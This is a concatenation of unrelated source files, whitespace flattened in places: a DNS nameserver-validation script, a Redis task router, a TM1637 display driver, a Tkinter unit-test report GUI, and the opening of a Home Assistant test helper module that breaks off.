in tld: # 若是多级顶级域名,则返回最后1级 return tld.split('.')[-1] else: return tld def fetch_tld_ns(): """ 获取顶级域名的权威服务器(ns)IP地址 """ tld_ns = defaultdict(set) try: db = MySQL(SOURCE_CONFIG) sql = 'SELECT tld,server_ipv4 from tld_ns_zone' db.query(sql) tld_ns_query = db.fetch_all_rows() # 获取已存储的顶级域名的权威服务器信息 except Exception, e: logger.logger.error("获取顶级域名异常:",e) return tld_ns db.close() for i in tld_ns_query: tld = str(i['tld']) if i['server_ipv4']: ipv4 = str(i['server_ipv4']).split(';') for ip in ipv4: for p in ip.split(','): if p: tld_ns[tld].add(p) return tld_ns def update_domain_ns_db(id): """添加获取域名的DNS数据""" # 解析关键字段信息 global domain_ns_result ns_result = [] try: db = MySQL(SOURCE_CONFIG) except: logger.logger.error("数据库连接失败") return for domain in domain_ns_result: v = domain_ns_result[domain] domain_ns = ','.join(v[0]) ns_md5 = hashlib.md5(domain_ns).hexdigest() tld_ns = ','.join(v[1]) ns_ns = ','.join(v[2]) invalid_ns = ','.join(v[3]) unknown_ns = ','.join(v[4]) verify_strategy = v[5] insert_time = v[6] ns_result.append((domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,id)) ns_sql = 'INSERT INTO domain_valid_ns (domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,task_id) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \ ON DUPLICATE KEY UPDATE ns_md5 = VALUES (ns_md5),domain_ns=VALUES(domain_ns),tld_ns=VALUES (tld_ns),ns_ns = VALUES (ns_ns),invalid_ns=VALUES (invalid_ns), \ unknown_ns=VALUES (unknown_ns), verify_strategy=VALUES (verify_strategy),insert_time = VALUES (insert_time),task_id = VALUES (task_id)' # 存在则更新,不存在则插入 try: db.update_many(ns_sql, ns_result) except Exception as e: logger.logger.error("更新域名的NS记录失败:" + str(e)) db.close() def create_queue(domains, main_domains): """ 创建首次探测的任务队列 """ for i, d in enumerate(domains): queue.put((d,main_domains[i])) def create_retry_queue(retry_domains): """ 创建二次探测的任务队列 """ for domain,main_domain in retry_domains: queue.put((domain,main_domain)) def obtain_domain_ns_by_tld(domain, tld_ns): """ 向顶级域名权威服务器请求域名的NS记录,采用子线程方式,加快探测效率 :param domain: string,要解析的域名 tld_ns: dict,顶级域名权威服务器的IP地址集合 :return domain_ns: 域名的权威服务器名称集合 is_retry: true/false, true表示该域名要再次进行探测,false则不需要 """ is_retry = True # 是否重新获取, 有顶级域名返回ns,或者是域名不存在,都不重新获取 status = [] tld = extract_domain_tld(domain) # 获取要查询域名tld if not tld: logger.logger.warning("不存在该域名:%s的顶级域名" % domain) return [] tld_ns_set = tld_ns.get(tld) # 顶级域名的权威服务器IP地址 if not tld_ns_set: logger.logger.warning("不存在该顶级域名:%s的权威服务器" % tld) return [] sub_thread = [] # 线程列表 domain_ns = [] for ip in tld_ns_set: t = NSubThread(get_domain_ns_hierarchical_dns, args=(domain, True, ip)) # 根据顶级域名权威数量,生成对应的子线程 sub_thread.append(t) t.start() for t in sub_thread: t.join() ns, ns_status = t.get_result() status.append(ns_status) if ns_status == 'TRUE': domain_ns.extend(ns[1]) is_retry = False # 若域名存在有效的ns,则不需要再次探测 elif ns_status == 'NOEXSIT': # 若域名不存在,也不需要再次探测 is_retry = False return list(set(domain_ns)), is_retry def obtaining_domain_ns_by_ns(domain,main_domain, tld_domain_ns): """ 向域名的权威服务器请求ns,获取域名权威服务器上的的ns记录集合 :param string domain: 要解析的原始域名 :param string main_domain: 主域名 :param list tld_domain_ns: tld解析的域名的ns权威服务器地址名称集合 :return list domain_ns: 经过验证后的有效域名ns地址集合 """ domain_ns = [] # 验证后的有效域名ns集合 sub_thread = [] # 子线程集合 tld_domain_valid_ns = [] # 顶级域名权威服务器解析的域名ns结果 tld_domain_valid_ns_dict = {} # 记录各个响应的内容结果 tld_domain_invalid_ns = [] # 顶级域名权威服务器解析的域名ns结果 ns_domain_invalid_ns = [] ns_domain_ns = [] # 域名权威服务器解析的域名ns结果 unknown_ns = [] # 未确定的ns # 创建子线程 for n in tld_domain_ns: t = 
NSubThread(query_domain_ns_by_ns, args=(main_domain, n)) sub_thread.append(t) t.setDaemon(True) t.start() # 获取域名权威服务器上的ns记录 for t in sub_thread: t.join() ns, ns_status, original_ns = t.get_result() if ns_status == 'TRUE': ns_domain_ns.extend(ns) tld_domain_valid_ns.append(original_ns) tld_domain_valid_ns_dict[original_ns] = ns else: tld_domain_invalid_ns.append(original_ns) ns_domain_ns = list(set(ns_domain_ns)) # 去重 if not tld_domain_valid_ns: # 若无ns,则返回空,停止 verify_strategy = 1 is_retry = True return domain_ns,tld_domain_ns,ns_domain_ns,list(set(ns_domain_invalid_ns+tld_domain_invalid_ns)),unknown_ns, verify_strategy, is_retry # 无有效的tld_ns,所以重新探测 ns_domain_del_ns = list(set(ns_domain_ns)-set(tld_domain_invalid_ns)) # 去除域名权威返回的ns中不可以正常解析的地址名称 is_same = set(tld_domain_valid_ns) == set(ns_domain_del_ns) # 判断有效两级的有效ns是否相同 # 相同,则直接返回正确的地址 if is_same: domain_ns = tld_domain_valid_ns # 域名有效的ns verify_strategy = 2 is_retry = False return domain_ns, tld_domain_ns, ns_domain_ns, list( set(ns_domain_invalid_ns + tld_domain_invalid_ns)), unknown_ns, verify_strategy, is_retry # 不同,进一步分析处理 intersection_ns = set(tld_domain_valid_ns).intersection(set(ns_domain_del_ns)) # 上下级ns的交集 # print intersection_ns if intersection_ns: # 交集不为空 is_retry = False domain_ns.extend(intersection_ns) # 首先,交集ns为部分有效ns verify_strategy = 3 # 对于只存在则域名ns的记录进行判断 only_ns = list(set(ns_domain_ns).difference(intersection_ns)) for n in only_ns: ns, ns_status, _ = query_domain_ns_by_ns(main_domain, n) # 向域名的权威ns请求域名的ns if ns_status == 'TRUE': # 可正常解析 if set(ns).intersection(set(domain_ns)): # 若与公共ns有交集,则判断为有效ns domain_ns.append(n) else: flag = verify_ns_by_ip(domain,n,domain_ns) if flag == 1: domain_ns.append(n) elif flag == 0: ns_domain_invalid_ns.append(n) else: unknown_ns.append(n) else: # 无法正常解析,则为无效ns ns_domain_invalid_ns.append(n) # 对于只存在在顶级域名权威的ns记录判断 only_tld = list(set(tld_domain_valid_ns).difference(intersection_ns)) for n in only_tld: ns = tld_domain_valid_ns_dict.get(n) if set(ns).intersection(set(domain_ns)): domain_ns.append(n) else: flag = verify_ns_by_ip(domain, n, domain_ns) if flag == 1: domain_ns.append(n) elif flag == 0: tld_domain_invalid_ns.append(n) else: unknown_ns.append(n) else: # 两级获取的ns完全不一样的情况 verify_strategy = 4 is_retry = True logger.logger.info("域名:%s 两级ns无交集" % domain) if ns_domain_del_ns: # ns不为空 tld_ip, tld_cname = [], [] tld_ip_dict, tld_cname_dict = {}, {} for n in tld_domain_valid_ns: ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain,n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): tld_ip.extend(ipv4) tld_cname.extend(cnames) tld_ip_dict[n] = ipv4 tld_cname_dict[n] = cnames ns_ip, ns_cname = [],[] ns_ip_dict, ns_cname_dict = {}, {} for n in ns_domain_del_ns: ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): ns_ip.extend(ipv4) ns_cname.extend(cnames) ns_ip_dict[n] = ipv4 ns_cname_dict[n] = cnames if not (ns_ip or ns_cname) and (tld_ip or tld_cname): # ns返回的ip为空,tld返回的不为空 for n in tld_ip_dict: domain_ns.append(n) elif (ns_ip or ns_cname) and not (tld_ip or tld_cname): # ns返回ip不为空,tld返回为空 for n in ns_ip_dict: domain_ns.append(n) elif (ns_ip or ns_cname) and (tld_ip or tld_cname): # 都不为空 for n in tld_ip_dict: if set(tld_ip_dict[n]).intersection(set(ns_ip)) or set(tld_cname_dict[n]).intersection(set(ns_cname)): domain_ns.append(n) else: unknown_ns.append(n) # print "无操作,修改程序" for n in ns_ip_dict: if set(ns_ip_dict[n]).intersection(set(tld_ip)) or set(ns_cname_dict[n]).intersection( set(tld_cname)): domain_ns.append(n) else: 
# print "无操作,修改程序" unknown_ns.append(n) else: # ns为空 for n in tld_domain_valid_ns: # 返回IP或cname ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): domain_ns.append(n) else: tld_domain_invalid_ns.append(n) domain_ns.sort() invalid_ns = list(set(ns_domain_invalid_ns + tld_domain_invalid_ns)) return domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy,is_retry def master_control(tld_ns): """主线程控制""" global domain_ns_result global retry_domains while queue.qsize(): logger.logger.info('存活线程: %s, 剩余任务: %s' % (threading.activeCount(),queue.qsize())) domain, main_domain = queue.get() ns_by_tld, is_retry = obtain_domain_ns_by_tld(main_domain, tld_ns) # 通过顶级域名权威获取域名的ns # print ns_by_tld, is_retry if ns_by_tld: domain_ns,tld_domain_ns,ns_domain_ns,invalid_ns, unknown_ns, verify_strategy,is_retry = obtaining_domain_ns_by_ns(domain,main_domain, ns_by_tld) if is_retry and not domain_ns: # 重试为true,并且无有效ns时,则重试 retry_domains.append((domain, main_domain)) # ns_md5 = hashlib.md5(domain_ns).hexdigest() else: if is_retry: retry_domains.append((domain, main_domain)) domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy = [], [], [], [], [], 0 # verify_strategy=0,表示没有获取tld的内容 insert_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") domain_ns_result[domain] = (domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy, insert_time) # time.sleep(1) queue.task_done() def verify_ns_by_ip(domain, ns, intersection_ns): """ 通过ip地址验证是否为有效ns :param string domain: 要验证的domain :param string ns: 要验证的ns :param list intersection_ns: 已经确认的有效ns集合 :return: int flag : 1/0/-1, 1表示有效,0表示无效, -1表示未知 """ ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, ns) verify_result = [] if ip_cname_status == 'TRUE' and (ipv4 or cnames): for n in intersection_ns: n_ipv4, n_cnames, n_ip_cname_status = query_ip_cname_by_ns(domain, n) if n_ip_cname_status == 'TRUE': if set(ipv4).intersection(set(n_ipv4)) or set(cnames).intersection(set(n_cnames)): verify_result.append(1) break # 出现交集,则停止 else: verify_result.append(-1) # 有ip地址,但是无交集 else: verify_result.append(0) else: verify_result.append(0) if 1 in verify_result: return 1 elif -1 in verify_result: return -1 else: return 0 def save_to_file(id): """ 将有效的ns存入到本地文件中 :param domain_ns: :param id: :return: """ global domain_ns_result insert_time = datetime.datetime.now().strftime("%Y%m%d%H%M%S") path = '../domain_data/' file_name = id+'_'+ insert_time try: fp = open(path+file_name,'w') for domain in domain_ns_result: domain_ns = domain_ns_result[domain][0] domain_ns = ','.join(domain_ns) if domain_ns: fp.write(domain+'\t'+'NS'+'\t'+domain_ns+'\n') fp.close() return file_name except Exception, e: print e return False def first_obtaining_domain_ns(domains,main_domains,tld_ns): """ 第一次获取域名的有效ns记录 """ create_queue(domains,main_domains) worker_list = [] for q in range(thread_num): # 开始任务 worker = Thread(target=master_control,args=(tld_ns,)) worker.setDaemon(True) worker.start() worker_list.append(worker) queue.join() def retry_obtaining_domain_ns(tld_ns): """ 再次探测第一次未成功获取ns的域名 """ global retry_domains if not retry_domains: return print '重新探测的域名数量:',len(retry_domains),retry_domains create_retry_queue(retry_domains) worker_list = [] for q in range(retry_thread_num): # 开始任务 worker = Thread(target=master_control, args=(tld_ns,)) worker.setDaemon(True) worker.start() worker_list.append(worker) queue.join() def obtaining_domain_ns(file_name,id): """主函数""" 
logger.logger.info('开始解析域名的NS记录,线程数量为:%s' % thread_num) tld_ns = fetch_tld_ns() domains, main_domains = read_domains(file_name) if insert_domains_db(domains): logger.logger.info("成功将域名更新到数据库") else: logger.logger.info('将域名更新到数据库失败') first_obtaining_domain_ns(domains, main_domains, tld_ns) retry_obtaining_domain_ns(tld_ns) if domain_ns_result: # 更新数据库和文件,也使用两个子线程完成 logger.logger.info('更新数据库...') update_domain_ns_db(id) logger.logger.info('更新数据库完成') logger.logger.info('存入文件...') file_name = save_to_file(id) logger.logger.info('存入文件完成') for _ in range(3): # 重试三次 flag = TaskConfirm(file_name).query_post() # 发送探测完成消息 if isinstance(flag, bool): # 成功则停止发送 break else: logger.logger.error('实时探测域名有效NS,确认探测失败:%s' % flag) logger.logger.info('结束解析域名的NS记录,线程数量为:%s' % thread_num) def main(): # file_name = '../domain_data/domains_201907011111' file_name = '../domain_data/top500.txt' # file_name = '../domain_data/test2.txt' obtaining_domain_ns(file_name,'4') # while True: # obtaining_domain_ns() # time.sleep(60) if __name__ == '__main__': main()
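# --- Illustrative sketch (not part of the Python 2 script above) -------------------
# The core of obtaining_domain_ns_by_ns() trusts NS names that both the TLD
# authoritative servers and the domain's own NS servers agree on, and sends the rest
# through per-name IP/CNAME checks. A minimal Python 3 rendering of that set logic:
def cross_validate_ns(tld_ns, domain_ns, invalid_ns=()):
    """Return (trusted, unresolved) NS names from the two views."""
    tld_view = set(tld_ns)
    ns_view = set(domain_ns) - set(invalid_ns)    # drop names that failed to resolve
    trusted = tld_view & ns_view                  # both levels agree -> treated as valid
    unresolved = (tld_view | ns_view) - trusted   # needs further IP/CNAME verification
    return sorted(trusted), sorted(unresolved)

if __name__ == '__main__':
    # Hypothetical data, not real measurement results.
    print(cross_validate_ns(['ns1.example.com', 'ns2.example.com'],
                            ['ns2.example.com', 'ns3.example.com']))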
router.py
# -*- encoding: utf-8 -*-
import json
import importlib
import os
import builtins
from multiprocessing import Process
from importlib.util import find_spec

__all__ = ['run']


def run():
    from utils.RedisHelper import RedisHelper
    _redis = RedisHelper()
    _redis.pubsub = _redis.conn.pubsub()
    _redis.pubsub.subscribe(_redis.sub_name)
    sub_message = next(_redis.pubsub.listen())
    print(sub_message)
    # subscription confirmation message, e.g. on manage.py -e local:
    # {'type': 'subscribe', 'pattern': None, 'channel': b'nlp_test_pub', 'data': 1}
    # if "subscribe" != sub_message['type'] or _redis.sub_name != sub_message["channel"].decode('utf-8', 'ignore'):
    #     raise RuntimeError("sub error")
    for message in _redis.pubsub.listen():
        if "message" != message['type'] or _redis.sub_name != message["channel"].decode('utf-8', 'ignore'):
            # should not happen for a single subscription
            print('type error')
            continue
        message['data'] = message['data'].decode('utf-8', 'ignore')
        try:
            data = json.loads(message['data'])
        except ValueError:
            # log and skip malformed payloads
            # print('json parse error', message)
            continue
        # require the mandatory fields
        if "type" not in data:
            continue
        # only the "initialize" task type is handled for now
        if "initialize" != data["type"]:
            continue
        # fetch the unique worker id for this task
        if "uid_list" not in data["data"]:
            continue
        id_list = data["data"]["uid_list"]
        try:
            uid = _redis.conn.rpop(id_list).decode('utf-8', 'ignore')
        except Exception:
            print("uid error, empty or missing list:", id_list)
            continue
        if int(uid) >= data["data"]["sub_count"]:
            raise IndexError("uid %s exceeds sub_count %s" % (uid, data["data"]["sub_count"]))
        # os.environ['uid'] = uid
        # print("initialize uid is ", uid)
        if find_spec('handlers.' + data.get("type", ""), package='..'):
            handlers = importlib.import_module('handlers.' + data.get("type", ""), package='..')
        else:
            # no matching handler module; skip instead of failing hard
            continue
        # possible refinement: dispatch to an attribute named after the task type
        # if hasattr(handlers, data.get("type", "")):
        #     handlers = getattr(handlers, data.get("type", ""))
        p = Process(target=handlers.run, args=[data, int(uid)])
        p.start()
        p.join()
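# --- Illustrative sketch (not part of router.py above) -----------------------------
# The loop above expects a JSON payload of the form
# {"type": "initialize", "data": {"uid_list": <redis list key>, "sub_count": N}}
# on the subscribed channel, with worker ids pre-pushed onto uid_list. The channel and
# key names below are hypothetical; RedisHelper's connection settings are assumed.
import json
import redis  # assumes the redis-py client is installed

def publish_initialize(channel='nlp_test_pub', uid_list='task:uids', sub_count=3):
    conn = redis.Redis()
    for uid in range(sub_count):          # ids the subscriber will rpop, one per worker
        conn.lpush(uid_list, uid)
    payload = {'type': 'initialize', 'data': {'uid_list': uid_list, 'sub_count': sub_count}}
    conn.publish(channel, json.dumps(payload))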
tm1637.py
"""Manipulate a TM1637 7-segment display.""" import math import threading from time import localtime, sleep from . import config as cg from .context import IO IO.setwarnings(False) IO.setmode(IO.BCM) HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d, 0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71] ADDR_AUTO = 0x40 ADDR_FIXED = 0x44 STARTADDR = 0xC0 class TM1637(object): """TM1637 7-Segment Display.""" def __init__(self, clk, dio, brightness=1.0): """Initializer.""" self.CLK = clk self.DIO = dio self.brightness = brightness self.double_point = False self.current_values = [0, 0, 0, 0] IO.setup(self.CLK, IO.OUT) IO.setup(self.DIO, IO.OUT) def cleanup(self): """Stop updating clock, turn off display, and cleanup GPIO.""" self.stop_clock() self.clear() IO.cleanup() def clear(self): """Clear display.""" b = self.brightness point = self.double_point self.brightness = 0 self.double_point = False data = [0x7F, 0x7F, 0x7F, 0x7F] self.show(data) # Restore previous settings: self.brightness = b self.double_point = point def show(self, data): """Show data on display.""" for i in range(0, 4): self.current_values[i] = data[i] self.start() self.write_byte(ADDR_AUTO) self.br() self.write_byte(STARTADDR) for i in range(0, 4): self.write_byte(self.coding(data[i])) self.br() self.write_byte(0x88 + int(self.brightness)) self.stop() def set_digit(self, idx, data): """Set 7-segment digit by index [0, 3].""" assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data) self.current_values[idx] = data self.start() self.write_byte(ADDR_FIXED) self.br() self.write_byte(STARTADDR | idx) self.write_byte(self.coding(data)) self.br() self.write_byte(0x88 + int(self.brightness)) self.stop() def set_brightness(self, percent): """Set brightness in range 0-1.""" max_brightness = 7.0 brightness = math.ceil(max_brightness * percent) if (brightness < 0): brightness = 0 if (self.brightness != brightness): self.brightness = brightness self.show(self.current_values) def show_colon(self, on): """Show or hide double point divider.""" if (self.double_point != on): self.double_point = on self.show(self.current_values) def write_byte(self, data): """Write byte to display.""" for i in range(0, 8): IO.output(self.CLK, IO.LOW) if (data & 0x01): IO.output(self.DIO, IO.HIGH) else: IO.output(self.DIO, IO.LOW) data = data >> 1 IO.output(self.CLK, IO.HIGH) # Wait for ACK IO.output(self.CLK, IO.LOW) IO.output(self.DIO, IO.HIGH) IO.output(self.CLK, IO.HIGH) IO.setup(self.DIO, IO.IN) while IO.input(self.DIO): sleep(0.001) if (IO.input(self.DIO)): IO.setup(self.DIO, IO.OUT) IO.output(self.DIO, IO.LOW) IO.setup(self.DIO, IO.IN) IO.setup(self.DIO, IO.OUT) def start(self): """Send start signal to TM1637.""" IO.output(self.CLK, IO.HIGH) IO.output(self.DIO, IO.HIGH) IO.output(self.DIO, IO.LOW) IO.output(self.CLK, IO.LOW) def stop(self): """Stop clock.""" IO.output(self.CLK, IO.LOW) IO.output(self.DIO, IO.LOW) IO.output(self.CLK, IO.HIGH) IO.output(self.DIO, IO.HIGH) def br(self): """Terse break.""" self.stop() self.start() def coding(self, data): """Set coding of display.""" point_data = 0x80 if self.double_point else 0 return 0 if data == 0x7F else HexDigits[data] + point_data def clock(self, military_time): """Clock thread script.""" # Based on: https://github.com/johnlr/raspberrypi-tm1637 self.show_colon(True) while (not self.__stop_event.is_set()): t = localtime() hour = t.tm_hour if not military_time: hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12 d0 = hour // 10 if hour // 10 else 0 d1 = hour % 10 d2 
= t.tm_min // 10 d3 = t.tm_min % 10 digits = [d0, d1, d2, d3] self.show(digits) # # Optional visual feedback of running alarm: # print digits # for i in tqdm(range(60 - t.tm_sec)): for i in range(60 - t.tm_sec): if (not self.__stop_event.is_set()): sleep(1) def start_clock(self, military_time=True): """Start clock thread.""" # Stop event based on: http://stackoverflow.com/a/6524542/3219667 self.__stop_event = threading.Event() self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,)) self.__clock_thread.daemon = True # stops w/ main thread self.__clock_thread.start() def stop_clock(self): """Stop clock thread.""" try: print('Attempting to stop live clock') self.__stop_event.set() self.clear() except AttributeError: print('No clock to close') if __name__ == '__main__': """Confirm the display operation""" # Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21) clock = cg.get_pin('7Segment', 'clk') digital = cg.get_pin('7Segment', 'dio') display = TM1637(CLK=clock, DIO=digital, brightness=1.0) print('clock', clock) print('digital', digital) display.clear() digits = [1, 2, 3, 4] display.show(digits) input('1234 - Working? (Press Key)') print('Updating one digit at a time:') display.clear() display.set_digit(1, 3) sleep(0.5) display.set_digit(2, 2) sleep(0.5) display.set_digit(3, 1) sleep(0.5) display.set_digit(0, 4) input('4321 - (Press Key)') print('Add double point\n') display.show_colon(True) sleep(0.2) print('Brightness Off') display.set_brightness(0) sleep(0.5) print('Full Brightness') display.set_brightness(1) sleep(0.5) print('30% Brightness') display.set_brightness(0.3) sleep(0.3) input('Start the clock?') display.start_clock(military_time=True) input('Stop the clock?') display.stop_clock()
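# --- Illustrative sketch (independent of the GPIO code above) ----------------------
# How the HexDigits table maps a digit to a TM1637 segment byte, with bit 7 carrying
# the decimal point / colon, mirroring TM1637.coding() above.
HEX_DIGITS = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d, 0x07,
              0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71]

def encode_digit(value, show_point=False):
    """Return the segment byte for a hex digit 0-15 (0x80 = point/colon bit)."""
    return HEX_DIGITS[value] | (0x80 if show_point else 0)

if __name__ == '__main__':
    # 12:34 -> per-digit segment bytes, colon bit set on the second digit
    print([hex(encode_digit(d, point)) for d, point in
           [(1, False), (2, True), (3, False), (4, False)]])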
UT_HTMLReportAnalysisAndReportPreparation_GUI.py
from tkinter import Label, Button, Entry import tkinter as tk from tkinter import messagebox, filedialog, StringVar, SUNKEN, W, X, BOTTOM from os import path import threading, sys import os import UT_HTMLReportAnalysisAndReportPreparation class GUI_COntroller: ''' This class initialize the required controls for TkInter GUI ''' def __init__(self,TkObject): #Load company image Imageloc=tk.PhotoImage(file='../Images/alstom_logo.gif') label3=Label(image=Imageloc,) label3.image = Imageloc label3.place(x=200,y=100) global TkObject_ref, entryText_UTResPath, AnalyseDirRunBatchButton #1. select LDRA Tool suite directory TkObject_ref = TkObject LDRAToolsuitePath=Button(TkObject_ref,activebackground='green',borderwidth=3, anchor="w", text='Select UT test results path:',width=30, command=lambda:GUI_COntroller.selectResDirectory("SourceFilePath"), cursor="hand2") LDRAToolsuitePath.place(x=30,y=200) LDRAToolsuitePath.config(font=('helvetica',10,'bold')) #1. This is text box where LDRA tool suite directory will be shown to user entryText_UTResPath = tk.StringVar() Entry_LDRAToolSuitePath= Entry(TkObject_ref, width=78, textvariable=entryText_UTResPath, bd=1) Entry_LDRAToolSuitePath.place(x=290,y=205) Entry_LDRAToolSuitePath.config(font=('helvetica',10), state="readonly") #Exit Window closeButton=Button(TkObject_ref,activebackground='green',borderwidth=4, text='Close Window', command=GUI_COntroller.exitWindow) closeButton.place(x=570,y=300) closeButton.config(font=('helvetica',11,'bold')) #select sequence files directory AnalyseDirRunBatchButton=Button(TkObject_ref,activebackground='green',borderwidth=4, text='Generate UT Report',width=25, command=GUI_COntroller.RunTest) AnalyseDirRunBatchButton.place(x=200,y=300) AnalyseDirRunBatchButton.config(font=('helvetica',11,'bold')) def selectResDirectory(dirSelectionType): global entryText_UTResPath currdir = os.getcwd() if dirSelectionType == "SourceFilePath": selectedDir_res = filedialog.askdirectory(initialdir=currdir, title='Please select UT Results directory') if len(selectedDir_res)> 0: if not path.isdir(selectedDir_res): entryText_UTResPath.set("") messagebox.showerror('Error','Please select a valid directory!') else: entryText_UTResPath.set(str(selectedDir_res)) def exitWindow(): TkObject_ref.destroy() def RunTest(): if len(entryText_UTResPath.get()) > 0: ProjectDirAnalysis.RunAnalysis() else: messagebox.showerror('Error','Please select LDRA tool path!') class ProjectDirAnalysis: def RunAnalysis(): global statusBarText AnalyseDirRunBatchButton.config(state="disabled") statusBarText = StringVar() StatusLabel = Label(TkObject_ref, textvariable=statusBarText, fg="green", bd=1,relief=SUNKEN,anchor=W) StatusLabel.config(font=('helvetica',11,'bold')) StatusLabel.pack(side=BOTTOM, fill=X) thread = threading.Thread(target=UT_HTMLReportAnalysisAndReportPreparation.script_exe, args = (entryText_UTResPath.get(), TkObject_ref, statusBarText)) thread.start() if __name__ == '__main__': root = tk.Tk() #Change the background window color root.configure(background='#b7bbc7') #Set window parameters root.geometry('850x680') root.title('UT Results analysis') #Removes the maximizing option root.resizable(0,0) ObjController = GUI_COntroller(root) #keep the main window is running root.mainloop() sys.exit()
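# --- Illustrative sketch (not part of the GUI above) -------------------------------
# The report-generation thread above writes into a Tk StringVar directly from a worker
# thread. A common alternative is to have the worker post messages to a queue and let
# the Tk main loop poll it with after(), keeping all widget updates on the GUI thread.
# Function and message names here are hypothetical.
import queue
import threading

def start_worker(messages):
    """Run the long analysis off the GUI thread, reporting progress via a queue."""
    def work():
        messages.put('Analysing UT results ...')
        messages.put('Report generated')
    threading.Thread(target=work, daemon=True).start()

def poll_status(root, status_var, messages, interval_ms=200):
    """Drain the queue on the Tk main loop and mirror it into the status StringVar."""
    try:
        while True:
            status_var.set(messages.get_nowait())
    except queue.Empty:
        pass
    root.after(interval_ms, poll_status, root, status_var, messages, interval_ms)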
common.py
"""Test the helper method for writing tests.""" from __future__ import annotations import asyncio from collections import OrderedDict from collections.abc import Awaitable, Callable, Collection from contextlib import contextmanager from datetime import datetime, timedelta import functools as ft from io import StringIO import json import logging import os import pathlib import threading import time from time import monotonic import types from typing import Any from unittest.mock import AsyncMock, Mock, patch from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401 from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import device_automation, recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, ) from homeassistant.components.mqtt.models import ReceiveMessage from homeassistant.config import async_process_component_config from homeassistant.const import ( DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_STATE_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.uuid as uuid_util import homeassistant.util.yaml.loader as yaml_loader _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" async def async_get_device_automations( hass: HomeAssistant, automation_type: device_automation.DeviceAutomationType, device_id: str, ) -> Any: """Get a device automation for a single device id.""" automations = await device_automation.async_get_device_automations( hass, automation_type, [device_id] ) return automations.get(device_id) def threadsafe_callback_factory(func): """Create threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. 
""" @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) loop_stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() loop_stop_event.set() orig_stop = hass.stop hass._stopped = Mock(set=loop.stop) def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() loop_stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop, load_registries=True): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return 